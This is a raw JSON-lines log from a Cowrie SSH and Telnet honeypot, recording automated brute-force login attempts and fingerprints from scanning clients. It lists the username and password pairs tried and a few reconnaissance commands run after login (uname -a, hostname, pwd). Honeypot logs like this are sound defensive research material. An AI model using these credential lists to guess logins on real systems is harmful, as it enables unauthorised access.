{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:38:14.505141Z","src_ip":"212.227.125.160","session":"7065a89f77b9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:38:14.505802Z","src_ip":"212.227.125.160","session":"7065a89f77b9"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.210.18","src_port":39656,"dst_ip":"1.2.3.4","dst_port":23,"session":"5ad6e032e9e4","protocol":"telnet","message":"New connection: 170.64.210.18:39656 (1.2.3.4:23) [session: 5ad6e032e9e4]","sensor":"my-vps","timestamp":"2025-08-28T21:38:14.624847Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:38:15.293197Z","src_ip":"170.64.210.18","session":"5ad6e032e9e4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:38:15.747933Z","src_ip":"170.64.210.18","session":"5ad6e032e9e4"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-08-28T21:38:15.808013Z","src_ip":"170.64.210.18","session":"5ad6e032e9e4"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T21:38:16.052392Z","src_ip":"170.64.210.18","session":"5ad6e032e9e4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0","size":514,"shasum":"2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:38:17.257435Z","src_ip":"170.64.210.18","session":"5ad6e032e9e4"}
{"eventid":"cowrie.session.closed","duration":2.637519121170044,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:38:17.262295Z","src_ip":"170.64.210.18","session":"5ad6e032e9e4"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin","message":"login attempt [root/Admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:38:22.315412Z","src_ip":"212.227.125.160","session":"7065a89f77b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:38:25.110492Z","src_ip":"212.227.125.160","session":"7065a89f77b9"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T21:38:25.111231Z","src_ip":"212.227.125.160","session":"7065a89f77b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:38:26.517854Z","src_ip":"212.227.125.160","session":"7065a89f77b9"}
{"eventid":"cowrie.session.closed","duration":"13.3","message":"Connection lost after 13.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:38:26.519392Z","src_ip":"212.227.125.160","session":"7065a89f77b9"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":23496,"dst_ip":"1.2.3.4","dst_port":22,"session":"992eb9c4898d","protocol":"ssh","message":"New connection: 186.225.142.90:23496 (1.2.3.4:22) [session: 992eb9c4898d]","sensor":"my-vps","timestamp":"2025-08-28T21:38:33.755612Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:38:33.756738Z","src_ip":"186.225.142.90","session":"992eb9c4898d"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":58336,"dst_ip":"1.2.3.4","dst_port":22,"session":"a675b6838f16","protocol":"ssh","message":"New connection: 201.148.180.50:58336 (1.2.3.4:22) [session: a675b6838f16]","sensor":"my-vps","timestamp":"2025-08-28T21:38:33.794297Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:38:33.949022Z","src_ip":"186.225.142.90","session":"992eb9c4898d"}
{"eventid":"cowrie.login.success","username":"root","password":"10pace","message":"login attempt [root/10pace] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:38:34.526207Z","src_ip":"186.225.142.90","session":"992eb9c4898d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:38:34.937436Z","src_ip":"186.225.142.90","session":"992eb9c4898d"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-28T21:38:34.938246Z","src_ip":"186.225.142.90","session":"992eb9c4898d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:38:34.967637Z","src_ip":"201.148.180.50","session":"a675b6838f16"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T21:38:34.968392Z","src_ip":"201.148.180.50","session":"a675b6838f16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:38:35.131510Z","src_ip":"186.225.142.90","session":"992eb9c4898d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:38:35.132575Z","src_ip":"186.225.142.90","session":"992eb9c4898d"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin","message":"login attempt [root/Admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T21:38:44.356955Z","src_ip":"201.148.180.50","session":"a675b6838f16"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T21:38:47.560532Z","src_ip":"201.148.180.50","session":"a675b6838f16"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T21:38:47.561355Z","src_ip":"201.148.180.50","session":"a675b6838f16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:38:49.275403Z","src_ip":"201.148.180.50","session":"a675b6838f16"}
{"eventid":"cowrie.session.closed","duration":"15.5","message":"Connection lost after 15.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:38:49.276649Z","src_ip":"201.148.180.50","session":"a675b6838f16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38746,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fe884f03086","protocol":"ssh","message":"New connection: 212.227.235.229:38746 (1.2.3.4:22) [session: 6fe884f03086]","sensor":"my-vps","timestamp":"2025-08-28T21:40:51.844051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T21:40:51.845033Z","src_ip":"212.227.235.229","session":"6fe884f03086"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T21:40:51.945946Z","src_ip":"212.227.235.229","session":"6fe884f03086"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T21:40:52.251890Z","src_ip":"212.227.235.229","session":"6fe884f03086"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:40:53.359612Z","src_ip":"212.227.235.229","session":"6fe884f03086"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":2322,"dst_ip":"1.2.3.4","dst_port":22,"session":"11f457ad647c","protocol":"ssh","message":"New connection: 212.227.125.160:2322 (1.2.3.4:22) [session: 11f457ad647c]","sensor":"my-vps","timestamp":"2025-08-28T21:41:10.343148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T21:41:10.344074Z","src_ip":"212.227.125.160","session":"11f457ad647c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T21:41:10.424590Z","src_ip":"212.227.125.160","session":"11f457ad647c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"dagmarka1304","message":"login attempt [admin/dagmarka1304] failed","sensor":"my-vps","timestamp":"2025-08-28T21:41:10.842407Z","src_ip":"212.227.125.160","session":"11f457ad647c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"openmediavault","message":"login attempt [admin/openmediavault] failed","sensor":"my-vps","timestamp":"2025-08-28T21:41:11.925846Z","src_ip":"212.227.125.160","session":"11f457ad647c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"11111111","message":"login attempt [admin/11111111] failed","sensor":"my-vps","timestamp":"2025-08-28T21:41:13.010726Z","src_ip":"212.227.125.160","session":"11f457ad647c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567","message":"login attempt [admin/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T21:41:14.111123Z","src_ip":"212.227.125.160","session":"11f457ad647c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"root","message":"login attempt [admin/root] failed","sensor":"my-vps","timestamp":"2025-08-28T21:41:15.194444Z","src_ip":"212.227.125.160","session":"11f457ad647c"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:41:16.289526Z","src_ip":"212.227.125.160","session":"11f457ad647c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36188,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1c8135b0442","protocol":"ssh","message":"New connection: 212.227.125.160:36188 (1.2.3.4:22) [session: b1c8135b0442]","sensor":"my-vps","timestamp":"2025-08-28T21:42:15.787221Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:42:15.838967Z","src_ip":"212.227.125.160","session":"b1c8135b0442"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56032,"dst_ip":"1.2.3.4","dst_port":22,"session":"77fb626f54c4","protocol":"ssh","message":"New connection: 217.72.205.35:56032 (1.2.3.4:22) [session: 77fb626f54c4]","sensor":"my-vps","timestamp":"2025-08-28T21:42:46.393643Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:42:46.394795Z","src_ip":"217.72.205.35","session":"77fb626f54c4"}
{"eventid":"cowrie.session.connect","src_ip":"210.91.157.107","src_port":56411,"dst_ip":"1.2.3.4","dst_port":23,"session":"683f6027e642","protocol":"telnet","message":"New connection: 210.91.157.107:56411 (1.2.3.4:23) [session: 683f6027e642]","sensor":"my-vps","timestamp":"2025-08-28T21:43:43.084620Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37723,"dst_ip":"1.2.3.4","dst_port":22,"session":"308091c5b1e5","protocol":"ssh","message":"New connection: 212.227.125.160:37723 (1.2.3.4:22) [session: 308091c5b1e5]","sensor":"my-vps","timestamp":"2025-08-28T21:43:54.059405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T21:43:54.060622Z","src_ip":"212.227.125.160","session":"308091c5b1e5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T21:43:54.140574Z","src_ip":"212.227.125.160","session":"308091c5b1e5"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"tomas","message":"login attempt [tomas/tomas] failed","sensor":"my-vps","timestamp":"2025-08-28T21:43:54.547053Z","src_ip":"212.227.125.160","session":"308091c5b1e5"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"abc123","message":"login attempt [tomas/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T21:43:55.631736Z","src_ip":"212.227.125.160","session":"308091c5b1e5"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"abcd123","message":"login attempt [tomas/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T21:43:56.715140Z","src_ip":"212.227.125.160","session":"308091c5b1e5"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"abcd1234","message":"login attempt [tomas/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T21:43:57.797998Z","src_ip":"212.227.125.160","session":"308091c5b1e5"}
{"eventid":"cowrie.login.failed","username":"tomas","password":"abc1234","message":"login attempt [tomas/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T21:43:58.881271Z","src_ip":"212.227.125.160","session":"308091c5b1e5"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:43:59.964414Z","src_ip":"212.227.125.160","session":"308091c5b1e5"}
{"eventid":"cowrie.session.closed","duration":30.47153615951538,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:44:13.556087Z","src_ip":"210.91.157.107","session":"683f6027e642"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48354,"dst_ip":"1.2.3.4","dst_port":22,"session":"d629ab1f18a8","protocol":"ssh","message":"New connection: 212.227.125.160:48354 (1.2.3.4:22) [session: d629ab1f18a8]","sensor":"my-vps","timestamp":"2025-08-28T21:44:24.071468Z"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:44:27.242922Z","src_ip":"212.227.125.160","session":"d629ab1f18a8"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":47850,"dst_ip":"1.2.3.4","dst_port":22,"session":"04ca1332615f","protocol":"ssh","message":"New connection: 201.148.180.50:47850 (1.2.3.4:22) [session: 04ca1332615f]","sensor":"my-vps","timestamp":"2025-08-28T21:44:34.638811Z"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T21:44:36.835597Z","src_ip":"201.148.180.50","session":"04ca1332615f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59399,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa52e228b1fb","protocol":"ssh","message":"New connection: 212.227.125.160:59399 (1.2.3.4:22) [session: fa52e228b1fb]","sensor":"my-vps","timestamp":"2025-08-28T21:44:43.771928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T21:44:43.772868Z","src_ip":"212.227.125.160","session":"fa52e228b1fb"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T21:44:43.832837Z","src_ip":"212.227.125.160","session":"fa52e228b1fb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26051982","message":"login attempt [admin/26051982] failed","sensor":"my-vps","timestamp":"2025-08-28T21:44:44.155674Z","src_ip":"212.227.125.160","session":"fa52e228b1fb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"26031981","message":"login attempt [admin/26031981] failed","sensor":"my-vps","timestamp":"2025-08-28T21:44:45.217951Z","src_ip":"212.227.125.160","session":"fa52e228b1fb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25111979","message":"login attempt [admin/25111979] failed","sensor":"my-vps","timestamp":"2025-08-28T21:44:46.281355Z","src_ip":"212.227.125.160","session":"fa52e228b1fb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"251086","message":"login attempt [admin/251086] failed","sensor":"my-vps","timestamp":"2025-08-28T21:44:47.343574Z","src_ip":"212.227.125.160","session":"fa52e228b1fb"}
